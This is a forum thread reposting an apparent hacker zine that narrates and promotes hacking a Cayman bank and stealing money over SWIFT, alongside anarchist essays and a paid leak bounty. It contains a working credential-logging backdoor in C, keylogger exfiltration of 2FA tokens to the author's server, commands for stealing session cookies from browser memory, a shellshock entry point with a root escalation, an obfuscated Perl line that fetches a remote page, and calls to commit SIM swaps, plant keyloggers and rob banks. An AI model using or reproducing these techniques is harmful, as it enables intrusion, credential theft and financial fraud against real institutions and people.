    [1] https://hausec.com/2019/08/12/offens...eral-movement/ [2] https://www.exploit-db.com/papers/41914 [3] https://blog.sevagas.com/IMG/pdf/BypassAVDynamics.pdf [4] https://www.trustedsec.com/blog/disc...-bypassing-it/ [5] https://www.tarlogic.com/en/blog/how-kerberos-works/ [6] https://www.tarlogic.com/en/blog/how...tack-kerberos/ [7] https://hausec.com/2019/03/05/penetr...ectory-part-i/ [8] https://hausec.com/2019/03/12/penetr...ctory-part-ii/ [9] https://adsecurity.org/ [10] https://github.com/infosecn1nja/AD-Attack-Defense [11] https://github.com/jhaddix/tbhm [12] https://blog.sublimesecurity.com/red...pear-phishing/ [12 - Recommended Reading] _______________________________________ / When the scientific level of a world \ | far exceeds its level of solidarity, | \ that world destroys itself. / -------------------------------------- \ _.---._ . . * \.' '. * * _.-~===========~-._ . (___________________) . * .' \_______/ .' .' .' ' - me Almost all hacking today is done by black hat hackers, for personal gain; or for white hat hackers, for the benefit of the shareholders (and in defense of the banks, companies and states that are annihilating us and the planet in which we live); and by military and intelligence agencies, as part of their war and conflict agenda. Seeing that this our world is already at the limit, I have thought that, in addition to these technical tips for learning to hack, I should include some resources that have been very important for my development and have guided me in the use of my hacking knowledge. * Ami: El Niño de las Estrellas – Enrique Barrios * La Anarquía Funciona: https://es.theanarchistlibrary.org/l...rquia-funciona * Viviendo Mi Vida – Emma Goldman * The Rise and Fall of Jeremy Hammond, Enemy of the State: https://www.rollingstone.com/culture...-state-183599/ Este cuate y el hack de HBGary fueron una inspiración * Días de Guerra, Noches de Amor – Crimethinc * Momo – Michael Ende * Cartas a un joven poeta – Rilke * Dominion (Documentary) "We cannot believe that, if we do not look, what we do not want to see will not happen" - Tolstoy in Первая ступень Bash Back! [13 - Heal] The hacker world has a high incidence of depression, suicides and certain battles with mental health. I don't think it's because of hacking, but because of the kind of environment that hackers mostly come from. Like many hackers, I grew up with little human contact: I was a girl raised by the internet. I have my struggles with depression and emotional numbness. Willie Sutton is frequently quoted as saying that he robbed banks because "that's where the money is," but the quote is incorrect. What he really said was: Why did I rob banks? Because I enjoyed it. I loved to do it. I was more alive when I was inside a bank, in full robbery, than at any other time in my life. I enjoyed it so much that one or two weeks later I was already looking for the next opportunity. But for me money was a minutiae, nothing more. Hacking has made me feel alive. It started as a way to self-medicate depression. Later I realized that, in reality, I could do something positive. I don't regret the way I grew up at all, it brought several beautiful experiences to my life. But I knew I couldn't continue living that way. So I began to spend more time away from my computer, with other people, learning to open myself to the world, to feel my emotions, to connect with others, to accept risks and be vulnerable. Things much harder than hacking, but at the mere hour the reward is more worth it. It is still an effort, but even if it is slow and wobbly, I feel that I am on my way. Hacking, done with conscience, can also be what heals us. According to Mayan wisdom, we have a gift granted by nature, which we must understand to put it at the service of the community. In [1], it is explained: When a person does not accept his job or mission he begins to suffer from seemingly incurable diseases; although he does not die in a short time, but only suffers, in order to wake up or become aware. That is why it is essential that a person who has acquired the knowledge and does his work in the communities must pay his Toj and maintain constant communication with the Creator and his ruwäch q’ij, since he constantly needs their strength and energy. Otherwise, the diseases that caused him to react or take the job could cause damage again. If you feel that hacking is feeding your isolation, depression, or other conditions, breathe. Give yourself some time to meet and become aware. You deserve to live happily, with health and fullness. ________________________ < All Cows Are Beautiful > ------------------------ \ \ ^__^ (oo)\_______ ( (__)\ )\/\ _) / ||----w | (.)/ || || `' [1] Ruxe’el mayab’ K’aslemäl: Raíz y espíritu del conocimiento maya https://www.url.edu.gt/publicaciones....ashx?Id=41748 [14 - The Bug Hacktivist Program] It seems to me that hacking to get and leak documents of public interest is one of the best ways in which hackers can use their skills for the benefit of society. Unfortunately for us hackers, as in almost every category, the perverse incentives of our economic system do not coincide with what benefits society. So this program is my attempt to make it possible for good hackers to earn a living in an honest way by revealing material of public interest, instead of having to go selling their work to the cybersecurity, cybercrime or business industries. Cyberwar Some examples of companies whose leaks I would love to pay for are: - the mining, logging and livestock companies that plunder our beautiful Latin America (and kill land and territory defenders trying to stop them) - companies involved in attacks on Rojava such as Baykar Makina or Havelsan - surveillance companies such as the NSO group - war criminals and birds of prey such as Blackwater and Halliburton - private penitentiary companies such as GeoGroup and CoreCivic / CCA, and corporate lobbyists such as ALEC Pay attention when choosing where to investigate. For example, it is well known that oil companies are evil: they get rich at the cost of destroying the planet (and back in the 80s the companies themselves already knew about the consequences of their activity [1]). But if you hack them directly, you will have to dive into an incredible amount of boring information about your daily operations. Very likely it will be much easier for you to find something interesting if instead you focus on your lobbyists [2]. Another way to select viable goals is to read stories of investigative journalists (such as [3]), which are interesting but lack solid evidence. And that is exactly what your hacks can find. I will pay up to 100 thousand USD for each filtration of this type, according to the public interest and impact of the material, and the labor required in the hacking. Needless to say, a complete leak of the documents and internal communications of any of these companies will be a benefit for society that exceeds those one hundred thousand, but I am not trying to enrich anyone. I just want to provide enough funds so that hackers can earn a decent living doing a good job. Due to time constraints and safety considerations I will not open the material, nor inspect it for myself, but I will read what the press says about it once it has been published, and I will make an estimate of the public interest from there. My contact information is at the end of the guide mentioned above [4]. How you get the material is your thing. You can use the traditional hacking techniques outlined in this guide and the previous one [4]. You could do a sim swap [5] on a corrupt businessman or politician, and then download his emails and backups from the cloud. You can order an IMSI catcher from alibaba and use it outside its offices. You can do some war-driving (the old way or the new [6]). You may be a person within your organizations that already has access. You can opt for a low-tech old-school style like in [7] and [8], and simply sneak into their offices. Whatever works for you. [1] https://www.theguardian.com/environm...hange-warnings [2] https://theintercept.com/2019/08/19/...line-protests/ [3] https://www.bloomberg.com/features/2...-una-eleccion/ [4] https://www.exploit-db.com/papers/41914 [5] https://www.vice.com/en_us/article/v...tagram-bitcoin [6] https://blog.rapid7.com/2019/09/05/t...s-my-keyboard/ [7] https://en.wikipedia.org/wiki/Citize...tigate_the_FBI [8] https://en.wikipedia.org/wiki/Unnecessary_Fuss [14.1 - Partial payments] Are you a good-hearted waitress working in a company of evil [1]? Would you be willing to sneak a physical keylogger into an executive's computer, change your USB charging cable for a modified one [2], hide a microphone in a meeting room where you plan your atrocities, or leave one of these [5] forgotten in some corner of the offices? [1] https://en.wikipedia.org/wiki/Evil_maid_attack [2] http://mg.lol/blog/defcon-2019/ [3] https://shop.hak5.org/products/lan-turtle Are you good with social engineering and phishing, and did you get a shell on an employee's computer, or did you get your vpn credentials using phishing? But maybe you couldn't get domain admin and download what you wanted? Did you participate in bug bounties programs and become an expert in web application hacking, but don't have enough hacker experience to completely penetrate the company? Do you have facility with reverse engineering? Scan some evil companies to see what devices they have exposed to the internet (firewall, VPN, and email gateways will be much more useful than things like IP cameras), apply reverse engineering and find some exploitable vulnerability remotely. If I can work with you to penetrate the company and get material of public interest, you will also be rewarded for your work. If I don't have the time to work on it myself, at least I will try to advise you on how to continue until you can complete the hacking on your own. Supporting those in power to hack and monitor dissidents, activists and the general population is today an industry of several billion dollars, while hacking and exposing those in power is a voluntary and risky job. Turning it into a multi-million dollar industry will certainly not fix that power imbalance, nor will it solve the problems. More of society. But I think it will be fun. So ... I want to see people starting to collect their rewards! [15 - Abolish prisons] Built by the enemy to enclose ideas enclosing companions to silence war cries it is the center of torture and annihilation where the human being becomes more violent It is the reflection of society, repressive and prison sustained and based on authoritarian logic repressed and guarded custodians thousands of dams and prisoners are exterminated before this schizophrenic and ruthless machine companion Axel Osorio giving the strip in the cane breaking the isolation and silencing fire and war to jail, we are destroying! Rap Insurgent - Words In Conflict It would be typical to end a hacker zine saying release hammond, release manning, release hamza, release detainees by mounting the дело Сети, etc. I am going to take this tradition to its most radical consequence[1], and to say: we must abolish prisons now! Being a criminal myself, they may think that what happens is that I have a slightly skewed view of the matter. But seriously, it is not even a controversial issue, even the UN almost agrees [2]. So, once and for all, free migrants [3][4][5][6], often imprisoned by those same countries that created the war and the environmental and economic destruction they are fleeing from. Free all those in prison because of the war against those who use drugs [7]. Free all people imprisoned in the war against the poor [8]. All the prisons is hide and ignore the proof of the existence of social problems, instead of fixing them. And until everyone is released, fight the prison system by remembering and keeping in mind those who are trapped in there. Send them honey, letters, helicopters [9], pirate radios [10] and books, and support those who organize from there with [11][12]. [1] http://www.bibliotecafragmentada.org...ones-final.pdf [2] https://www.unodc.org/pdf/criminal_j...prisonment.pdf [3] https://www.theguardian.com/us-news/...anta-wish-list [4] https://www.theguardian.com/us-news/...tucson-arizona [5] https://www.playgroundmag.net/now/de..._22648665.html [6] https://www.nytimes.com/2019/06/26/w...s-suicide.html [7] https://en.wikiquote.org/wiki/John_Ehrlichman#Quotes [8] VI, 2. i. The Unpaid Fine: https://scielo.conicyt.cl/scielo.php...22012000100005 [9] p. 10, Libel Nº2. Political bulletin from the High Security Prison [10] https://itsgoingdown.org/transmissio...ile-territory/ [11] https://freealabamamovement.wordpres...et-who-we-are/ [12] https://incarceratedworkers.org/ [16 - Conclusion] Our world is upside down [1]. We have a justice system that represents injustice. The law and order are there to create an illusion of social peace, and hide the systematic and profound exploitation, violence, and injustice. Better follow your conscience, and not the law. [1] http://resistir.info/livros/galeano_patas_arriba.pdf Businessmen enrich themselves by mistreating people and the planet, while care work is largely unpaid. Through the assault on everything communal, we have somehow raised densely populated cities, plagued by loneliness and isolation. The cultural, political and economic system in which we live encourages the worst facets of human nature: greed, selfishness and self-centeredness, competitiveness, lack of compassion and attachment to authority. So, for those who have managed to remain sensitive and compassionate in a cold world, for all the everyday heroines that practice goodness in small things, for all of you who still have a star burning in your hearts: гоpи, гоpи ясно, чтобы не погасло! _____________________ <Let's sing together! > --------------------- \ \ ^__^ (oo)\_______ ( (__)\ )\/\ _) / ||----w | (.)/ || || Open heart Open feeling Open understanding Leave reason aside And let the sun hidden inside you shine perl -Mre=eval <<\EOF '' =~( '(?' .'{'.( '`'|'%' ).("\["^ '-').('`'| '!').("\`"| ',').'"(\\$' .':=`'.(('`')| '#').('['^'.'). ('['^')').("\`"| ',').('{'^'[').'-'.('['^'(').('{'^'[').('`'|'(').('['^'/').('['^'/').( '['^'+').('['^'(').'://'.('`'|'%').('`'|'.').('`'|',').('`'|'!').("\`"| '#').('`'|'%').('['^'!').('`'|'!').('['^'+').('`'|'!').('['^"\/").( '`'|')').('['^'(').('['^'/').('`'|'!').'.'.('`'|'%').('['^'!') .('`'|',').('`'|'.').'.'.('`'|'/').('['^')').('`'|"\'"). '.'.('`'|'-').('['^'#').'/'.('['^'(').('`'|('$')).( '['^'(').('`'|',').'-'.('`'|'%').('['^('(')). '/`)=~'.('['^'(').'|</'.('['^'+').'>|\\' .'\\'.('`'|'.').'|'.('`'|"'").';'. '\\$:=~'.('['^'(').'/<.*?>//' .('`'|"'").';'.('['^'+').('['^ ')').('`'|')').('`'|'.').(('[')^ '/').('{'^'[').'\\$:=~/('.(('{')^ '(').('`'^'%').('{'^'#').('{'^'/') .('`'^'!').'.*?'.('`'^'-').('`'|'%') .('['^'#').("\`"| ')').('`'|'#').( '`'|'!').('`'| '.').('`'|'/') .'..)/'.('[' ^'(').'"})') ;$:="\."^ '~';$~='@' |'(';$^= ')'^'['; $/='`' |'.'; $,= '(' EOF We were born at night. We live in it, we hack in it. Here we are, we are the rebel dignity, the forgotten heart of the Интернет. Our fight is for memory and justice, and the bad government is filled with criminals and murderers. Our fight is for fair and decent work, and bad government and corporations buy and sell zero days. For all tomorrow. For us the happy rebellion of the leaks and expropriation. For all everything. For us nothing. From the mountains of the Cyber Southeast, _ _ _ ____ _ _ | | | | __ _ ___| | __ | __ ) __ _ ___| | _| | | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / | | _ | (_| | (__| < | |_) | (_| | (__| <|_| |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
    Last edited by Blastolabs; 23rd March 2023 at 01:34.

  6. The Following 5 Users Say Thank You to Blastolabs For This Post:

    Ewan (23rd March 2023), ExomatrixTV (23rd March 2023), Harmony (23rd March 2023), RatRodRob...RRR (23rd March 2023), ronny (23rd March 2023)

  7. Link to Post #4
    Aaland Avalon Member Blastolabs's Avatar
    Join Date
    3rd November 2020
    Language
    English
    Posts
    442
    Thanks
    1,649
    Thanked 3,352 times in 432 posts

    Default Re: Crime Theorists 'Crowdsourcing Network' Gaining Momentum?

    ^^^

    Open heart
    Open feeling
    Open understanding
    Leave reason aside
    And let the sun hidden inside you shine
    perl -Mre=eval

  8. The Following User Says Thank You to Blastolabs For This Post:

    ExomatrixTV (23rd March 2023)

  9. Link to Post #5
    Avalon Member
    Join Date
    26th May 2010
    Location
    Albuquerque, NM, USA
    Age
    73
    Posts
    2,450
    Thanks
    11,327
    Thanked 22,062 times in 2,419 posts

    Default Re: Crime Theorists 'Crowdsourcing Network' Gaining Momentum?

    Quote Posted by Blastolabs (here)
    The best real world example I am familiar with is Phineas Phisher.

    Why?

    Well in just a few weeks of human perceived time he hacked the CIA, hacked the NSA, then stole a couple hundred thousand dollars from a bank in the Cayman Islands

    Why?

    Quote:
    Make no mistake, expropriation is not theft. It is not the confiscation of money earned "with the sweat of the forehead". It is not theft of private property. It is, rather, the recovery of enormous amounts of land and wealth that have been forged with stolen natural resources, human slavery, forced labor force and amassed in hundreds of years by a small minority. This wealth ... is illegitimate, both for moral purposes and for the exploitation mechanisms that have been used to create it.
    For Colin, the first step is that “we have to free ourselves from our mental ties (believing that wealth and private property have been earned by those who monopolize them; and that, therefore, they should be something to respect, revere, and even something to pursue), open our minds, study and learn from history, and recognize this illegitimacy together”. Here are some books that have helped me with this: [7] [8] [9] [10] [11].

    According to Barack Obama, economic inequality is "the challenge that defines our time." Computer hacking is a powerful tool to combat economic inequality.

    The former director of the NSA, Keith Alexander, agrees and says that hacking is responsible for "the greatest transfer of wealth in history."

    ______________________________
    / The story is ours \
    \ and it is done by hackers! /
    ----------------------------

    \
    \ ^__^
    (oo)\_______
    ( (__)\ )\/\
    _) / ||----w |
    (.)/ || ||
    `'

    Everyone together, now and forever!

    [1] https://sursiendo.com/docs/Pensar_de...omunes_web.pdf
    [2] https://chomsky.info/commongood02/
    [3] The Will to Change: Men, Masculinity, and Love
    [4] their own religion is very clear about this: https://dailyverses.net/es/materialismo
    [5] https://elpulso.hn/la-filantropia-en...l-capitalismo/
    [6] http://www.hamptoninstitution.org/ex...n-or-bust.html
    [7] Manifiesto por una Civilización Democrática. Volumen 1, Civilización: La Era de los Dioses Enmascarados y los Reyes Cubiertos
    [8] Calibán y la Bruja
    [9] En deuda: Una historia alternativa de la economía
    [10] La otra historia de los Estados Unidos
    [11] Las venas abiertas de América Latina

    why/HOW?

    Code:
      _______________________________
           < Our weapons are our keyboards >
            --------------------------------
                      \
                       \ ^__^
                         (oo)\_______
                      (  (__)\       )\/\
                       _) /  ||----w |
                      (.)/   ||     ||
                       `'    ^^     ^^
     [2 - Introduction]
    This guide explains how I hacked the Cayman Bank and Trust Company (Isle of Man).  Why am I publishing this, almost four years later?
     1) To show what is possible
    Hackers working for social change have limited themselves to developing security and privacy tools, DDoS, performing vandalism and leaks. Wherever you go, there are radical projects for a social change in a complete state of precariousness, and there would be much that they could do with some expropriated money. At least for the working class, bank robbery is something socially accepted, and those who do are seen as heroes of the people. In the digital age, robbing a bank is a non-violent, less risky act, and the reward is greater than ever. So why are only black hat hackers doing it for their personal benefit, and never hacktivists to finance radical projects? Maybe they don't think they are capable of doing it. The big bank hacks are on the news every so often, such as the hacking of the Bank of Bangladesh [1], which was attributed to North Korea, or the hacking of banks attributed to the Carbanak group [2], which they describe as a very large and well organized group of Russian hackers, with different members who would be specialized in different tasks. But, it is not that complicated.
    
    It is because of our collective belief that the financial system is unquestionable that we exercise control over ourselves, and maintain the class system without those above having to do anything [3]. Being able to see how vulnerable and fragile the financial system really is helps us break that collective hallucination. That is why banks have a strong incentive not to report hacks, and to exaggerate how sophisticated the attackers are. None of the financial hacks I made, or those I've known, have ever been reported. This is going to be the first, and not because the bank wanted to, but because I decided to publish it.
    
    As you are about to learn in this home guide, hacking a bank and transferring money through the SWIFT network does not require the support of any government or a large and specialized group.  It is something totally possible being a mere amateur hacker, with only public tools and basic knowledge of how to write a script.
    [1] https://elpais.com/economia/2016/03/...94_374693.html 
    [2] https://securelist.lat/el-gran-robo-...arbanak/67508/ 
    [3] https://es.wikipedia.org/wiki/Hegemon%C3%ADa_cultural 
     2) Help withdraw cash
    Many of those who read this already have, or with a little study will be able to acquire, the skills needed to carry out a hack like this. 
     However, many will find that they lack the necessary criminal connections to get the handles in condition. In my case, this was the first bank that hacked, and at that time I only had a few and mediocre accounts ready to withdraw the cash (known as bank drops), so it was only a few hundred thousand that I could withdraw at total, when it is normal to get millions. Now, on the other hand, I do have the knowledge and connections to get cash more seriously, so if you are hacking a bank but need help to convert that into real money, and you want to use that money to finance radical social projects, you can contact me.
    
     3) Collaborate
    It is possible to hack banks as an amateur who works alone, but the net is that, in general, it is not as easy as I paint it here.  I was lucky with this bank for several reasons:
    1. It was a small bank, so it took me much less time to understand how everything worked.
    2. They had no procedure to check the sent swift messages.  Many banks have one, and you need to write code to hide your transfers from their monitoring system.
    3. They only used password authentication to access the application with which they connected to the SWIFT network. Most banks now use RSA SecurID, or some form of 2FA.  You can skip this by typing code to get an alert when your token enters, so you can use it before it expires. It's simpler than it seems: I used Get-Keystrokes [1], modifying it so that instead of storing the pressed keys, a GET request is made to my server every time it is detected that they have entered a username. This request adds the username to the url and, as they type the token, several GETs are made with the token digits concatenated to the url. On my side I leave this running in the meantime:
      ssh me@my_secret_server 'tail -f /var/log/apache2/access_log'
        | while read i; do echo $i; aplay alarma.wav &> /dev/null; done
     If it is a web application, you can skip the 2FA by stealing the cookie after they have authenticated. I am not an APT with a team of coders who can make me customized tools. I am a simple person who subsists on what the terminal gives [2], so what I use is:
    procdump64 /accepteula -r -ma PID_of_browser
     strings64 /accepteula * .dmp |  findstr PHPSESSID 2> nul
     or going through findstr rather than strings, which makes it much faster:
    findstr PHPSESSID * .dmp> tmp
         strings64 /accepteula tmp |  findstr PHPSESSID 2> nul
    
    Another way to skip it is to access your session with a hidden VNC (hvnc) after they have authenticated, or with a little creativity you could also focus on another part of their process instead of sending SWIFT messages directly.
    
    I think that if I collaborated with other experienced bank hackers we could hack hundreds of banks like Carnabak, instead of doing one from time to time on my own.  So if you have experience with similar hacks and want to collaborate, contact me.  You will find my email and my PGP key at the end of the previous guide [3].
    
    [1] https://github.com/PowerShellMafia/P...Keystrokes.ps1
    [2] https://lolbas-project.github.io/
    [3] https://www.exploit-db.com/papers/41914
    ________________________________________
    / If robbing a bank could change things, \
    \ they’d make it illegal.                /
     ----------------------------------------
             \
              \ ^__^
                (oo)\_______
             (  (__)\       )\/\
              _) /  ||----w |
             (.)/   ||     ||
    
    
    [3 - Be careful out there]
    It is important to take some simple precautions. I will refer to this same section of my last guide [1], since it seems to work just fine [2]. All I have to add is that, in Trump's words, "Unless you catch hackers in the act, it is difficult to determine who was doing the hacking," so the police are getting more and more creative [3][4] in their attempts to grab criminals in the act (when their encrypted hard drives are unlocked). So it would be nice if for example you carry a certain bluetooth device and configure your computer to turn off when it moves beyond a certain range, or when an accelerometer detects movement, or something like that. It may be that writing long articles detailing your actions and your ideology is not the safest thing in the world (oops!), but at times I feel I have to. If I didn't believe in who listens to me If I didn't believe in what hurts If I didn't believe in what's left If I didn't believe in what I fought What a thing ... What was the club without a quarry? [1] https://www.exploit-db.com/papers/41914 [2] https://www.wifi-libre.com/topic-126...as-fisher.html [3] https://www.wired.com/2015/05/silk-road-2/ [4] https://motherboard.vice.com/en_us/a...y-arrest-video Many blame queer people for the decline of this society; we are proud of it Some believe we want to reduce to ashes this civilization and its moral fabric; They couldn't be more right They often describe us as depraved, decadent and revolting But alas! They haven't seen anything yet (https://theanarchistlibrary.org/libr...e-gay-do-crime) [4 - Get access] In another place [1] I talked about the main ways to get initial access to a company's network during a targeted attack. However, this was not a targeted attack. I did not set out to hack a specific bank, what I wanted was to hack any bank, which ends up being a much simpler task. This type of nonspecific approach was popularized by Lulzsec and Anonymous [2]. As part of the earlier essay, I prepared an exploit and post-exploitation tools for a popular VPN device. Then I started scanning the entire internet with zmap and zgrab to identify other vulnerable devices [3]. I had the scanner save the vulnerable IPs, along with the common and alt names of the device's SSL certificate, the device's Windows domain names, and the reverse DNS lookup of the IP. I grepped the results for the word "bank", and there were plenty to choose from, but the truth is that I was attracted to the word "Cayman", and that's how I came to choose this one. [1] https://www.exploit-db.com/papers/41914 [2] https://web.archive.org/web/20190329...org/0x0098.png [3] https://github.com/zmap/zmap [4.1 - The Exploit] When I published my latest DIY guide [1] I did not reveal the details of the sonicwall exploit that I had used to hack Hacking Team, as it was very useful for other hacks (such as this one) and I still had not finished having fun with it. Determined then to hack Hacking Team, I spent weeks reverse engineering their sonicwall ssl-vpn model, and even managed to find several memory corruption vulnerabilities that were more or less difficult to exploit, before I realized that the device was easily exploitable with shellshock [2]. When shellshock came out, many sonicwall devices were vulnerable, with only a request to cgi-bin/welcome and a payload in the user-agent. Dell released a security update and an advisory for these versions. The version used by Hacking Team and this bank had the vulnerable bash version, but the cgi requests did not trigger the shellshock- except for the requests to a shell script, and there was one accessible: cgi-bin/jarrewrite.sh. This seems to have escaped Dell's notice, since they never released a security update or an advisory for that version of the sonicwall. And, kindly, Dell had setuid’d root on dos2unix, leaving the device easy to root. In my last guide many read that I spent weeks researching a device until I found an exploit, and assumed that it meant that I was some kind of elite hacker. The reality, that is, the fact that it took me two weeks to realize that it was trivially exploitable with shellshock, is perhaps less flattering to me, but I think it is also more inspiring. Shows that you can really do this for yourself. You don't need to be a genius, I certainly am not. Actually my work against Hacking Team started a year earlier. When I discovered Hacking Team and the Gamma Group in the CitizenLab investigations [3][4], I decided to explore a bit and see if I could find anything. I didn't get anywhere with Hacking Team, but I was lucky with Gamma Group, and I was able to hack their customer support portal with basic sql injection and file upload vulnerabilities [5][6]. However, although the customer support server gave me a pivot towards the internal network of Gamma Group, I was unable to penetrate further into the company.
    From this experience with the Gamma Group and other hacks, I realized that I was really limited by my lack of knowledge about privilege escalation and lateral movement in windows domains, active directory and windows in general. So I studied and practiced (see section 11), until I felt I was ready to pay a visit to Hacking Team almost a year later. The practice paid off, and this time I was able to make a complete commitment from the company [7]. Before I realized that I could enter with shellshock, I was willing to spend happy whole months of life studying exploit development and writing a reliable exploit for one of the memory corruption vulnerabilities I had encountered. I just knew that Hacking Team needed to be exposed, and that it would take me as much time as necessary and learn what I had to learn to get it. To perform these hacks you don't need to be bright. You don't even need great technical knowledge. You just need dedication, and believe in yourself.
    [1] https://www.exploit-db.com/papers/41914 [2] https://es.wikipedia.org/wiki/Shells...or_de_software) [3] https://citizenlab.ca/tag/hacking-team/ [4] https://citizenlab.ca/tag/finfisher/ [5] https://theintercept.com/2014/08/07/...ng-protesters/ [6] https://www.exploit-db.com/papers/41913 [7] https://web.archive.org/web/20150706...om/hackingteam [4.2 - The Backdoor] Part of the backdoor I prepared for Hacking Team (see the first footnote in section 6) was a simple wrapper on the login page to capture passwords: #include <stdio.h> #include <unistd.h> #include <fcntl.h> #include <string.h> #include <stdlib.h> int main() { char buf[2048]; int nread, pfile; /* pull the log if we send a special cookie */ char *cookies = getenv("HTTP_COOKIE"); if (cookies && strstr(cookies, "our private password")) { write(1, "Content-type: text/plain\n\n", 26); pfile = open("/tmp/.pfile", O_RDONLY); while ((nread = read(pfile, buf, sizeof(buf))) > 0) write(1, buf, nread); exit(0); } /* the parent stores the POST data and sends it to the child, which is the actual login program */ int fd[2]; pipe(fd); pfile = open("/tmp/.pfile", O_APPEND | O_CREAT | O_WRONLY, 0600); if (fork()) { close(fd[0]); while ((nread = read(0, buf, sizeof(buf))) > 0) { write(fd[1], buf, nread); write(pfile, buf, nread); } write(pfile, "\n", 1); close(fd[1]); close(pfile); wait(NULL); } else { close(fd[1]); dup2(fd[0],0); close(fd[0]); execl("/usr/src/EasyAccess/www/cgi-bin/.userLogin", "userLogin", NULL); } } In the case of Hacking Team, they were logging on to the VPN with single-use passwords, so the VPN gave me access only to the network, and from there it took an extra effort to get domain admins on their network. In the other guide I wrote about side passes and privilege escalation in windows domains [1]. In this case, on the other hand, it was the same Windows domain passwords that were used to authenticate against the VPN, so I could get a good user password, including that of the domain admin. Now I had full access to his network, but usually this is the easy part. The most complicated part is to understand how they operate and how to get what you want out of their network. [1] https://www.exploit-db.com/papers/41914 [4.3 - Fun facts] Following the investigation they did about the hacking, I found it interesting to see that, by the same time I did it, the bank could have been compromised by someone else through a targeted phishing email [1]. As the old saying goes, "give a man an exploit and he will have access for a day, teach phishing and he will have access all his life" [2]. The fact that someone else, by chance and at the same time as me, put this small bank in the spotlight (they registered a domain similar to the real domain of the bank to be able to phish from there) suggests that bank hacks occur with much more frequently than is known. A fun suggestion for you to follow the investigations of your hacks is to have a backup access, one that you won't touch unless you lose normal access. I have a simple script that expects commands once a day, or less, just to maintain long-term access in case they block my regular access. Then I had a powershell empire [3] calling home more frequently to a different IP, and I used empire to launch meterpreter [4] against a third IP, where I did most of my work. When PWC started investigating the hacking, they found my use of empire and meterpreter and cleaned those computers and blocked those IPs, but they didn't detect my backup access. PWC had placed network monitoring devices, in order to analyze the traffic and see if there were still infected computers, so I didn't want to connect much to their network. I only launched mimikatz once to get the new passwords, and from there I could continue my research by reading their emails in the outlook web access. [1] page 47, Project Pallid Nutmeg.pdf, in torrent [2] https://twitter.com/thegrugq/status/563964286783877121 [3] https://github.com/EmpireProject/Empire [4] https://github.com/rapid7/metasploit-framework [5 - Understand Banking Operations] To understand how the bank operated, and how I could get money, I followed the techniques that I summarized in [1], in section “13.3 - Internal Recognition”. I downloaded a list of all file names, grepped for words like "SWIFT" and "transfer", and downloaded and read all files with interesting names. I also looked for emails from employees, but by far the most useful technique was to use keyloggers and screenshots to see how bank employees worked. I didn't know it at the time, but for this, Windows has a very good monitoring tool [2]. As described in technique no. 5 of section 13.3 in [1], I made a capture of the keys pressed throughout the domain (including window titles), I did a grep in search of SWIFT, and found some employees opening ‘SWIFT Access Service Bureau - Logon’. For those employees, I ran meterpreter as in [3], and used the post/windows/gather/screen_spy module to take screenshots every 5 seconds, to see how they worked. They were using a remote citrix app from the bottomline company [4] to access the SWIFT network, where each payment message SWIFT MT103 had to go through three employees: one to "create" the message, one to "verify" it, and another to "authorize it." Since I already had all their credentials thanks to the keylogger, I could easily perform all three steps myself. And from what I knew after seeing them work, they didn't review the SWIFT messages sent, so I should have enough time to get the money from my bank drops before the bank realized and tried to reverse the transfers. [1] https://www.exploit-db.com/papers/41914 [2] https://cyberarms.wordpress.com/2016...th-metasploit/ [3] https://www.trustedsec.com/blog/no_psexec_needed/ [4] https://www.bottomline.com/uk/produc...ccess-services _______________________________________ / Whoever robs a thief, gets 100 years \ \ of forgiveness. / --------------------------------------- \ \ ^__^ (oo)\_______ ( (__)\ )\/\ _) / ||----w | (.)/ || || `' [6 - Send the money] I had no idea what I was doing, so I was discovering it along the way. Somehow, the first transfers I sent went well. The next day, I screwed up by sending a transfer to Mexico that ended my fun. This bank sent its international transfers through its correspondent account in Natwest. I had seen that the correspondent account for transfers in pounds sterling (GBP) appeared as NWBKGB2LGPL, while for the others it was NWBKGB2LXXX. The Mexican transfer was in GBP, so I assumed that I had to put NWBKGB2LGPL as a correspondent. If I had prepared it better I would have known that the GPL instead of XXX indicated that the payment would be sent through the UK Fast Payment Service, rather than as an international transfer, which obviously will not work when you are trying of sending money to Mexico. So the bank got an error message. On the same day I also tried to send a payment of £200k to the UK using NWBKGB2LGPL, which was not made because 200k exceeded the shipping limit by fast payments, and would have had to use NWBKGB2LXXX instead. They also received an error message for this. They read the messages, investigated it, and found the rest of my transfers. [7 - The loot] From what I write, you can get a complete idea of what my ideals are and to what things I give my support. But I would not like to see anyone in legal trouble for receiving expropriated funds, so not another word of where the money went. I know that journalists are probably going to want to put some number on how many dollars were distributed in this hack and similar ones, but I prefer not to encourage our perverse habit of measuring the actions just by their economic value. Any action is admirable if it comes from love and not from the ego. Unfortunately those above, the rich and powerful, public figures, businessmen, people in "important" positions, those that our society most respects and values, those have been placed where they are based on acting more since the ego than from love. It is in the simple, humble and "invisible" people that we should look at and whom we should admire. [8 - Cryptocurrencies] Redistributing expropriated money to Chilean projects seeking positive social change would be easier and safer if those projects accepted anonymous donations via cryptocurrencies such as monero, zcash, or at least bitcoin. It is understood that many of these projects have an aversion to cryptocurrencies, as they resemble some strange hypercapitalist dystopia rather than the social economy we dream of. I share their skepticism, but I think they are useful to allow donations and anonymous transactions, by limiting government surveillance and control. Same as cash, whose use many countries are trying to limit for the same reason. [9 - Powershell] In this operation, as in [1], I used a lot of powershell. Then, powershell was super cool, you could do almost anything you wanted, without antivirus detection and with very little forensic footprint. It happens that with the introduction of AMSI [2], offensive powershell is retiring. Today offensive C# is what is on the rise, with tools like [3][4][5][6]. AMSI is going to get to .NET for 4.8, so the tools in C# probably still have a couple of years left before they get dated. And then we will use C or C++ again, or maybe Delphi will become fashionable again. The specific tools and techniques change every few years, but basically it is not so much what changes, today hacking is essentially the same thing it was in the 90s. In fact, all the powershell scripts used in this guide and in the previous one are still perfectly usable today, after a little obfuscation of your own. [1] https://www.exploit-db.com/papers/41914 [2] https://medium.com/@byte_St0rm/adven...i-25d235eb749c [3] https://cobbr.io/SharpSploit.html [4] https://github.com/tevora-threat/SharpView [5] https://www.harmj0y.net/blog/redteaming/ghostpack/ [6] https://web.archive.org/web/20191114...nut-tikitorch/ ___________________________ / Fo Sostyn, Fo Ordaag \ \ Financial Sector **** Off / --------------------------- \ \ ^__^ (oo)\_______ ( (__)\ )\/\ _) / ||----w | (.)/ || || `' [10 - Torrent] Privacy for the weak, transparency for the powerful. Offshore banking provides executives, politicians and millionaires with privacy from of their own government. Exposing them may sound hypocritical on my part, since I am generally in favor of privacy and against government oversight. But the law was already written by and for the rich: it protects its system of exploitation, with some limits (such as taxes) so 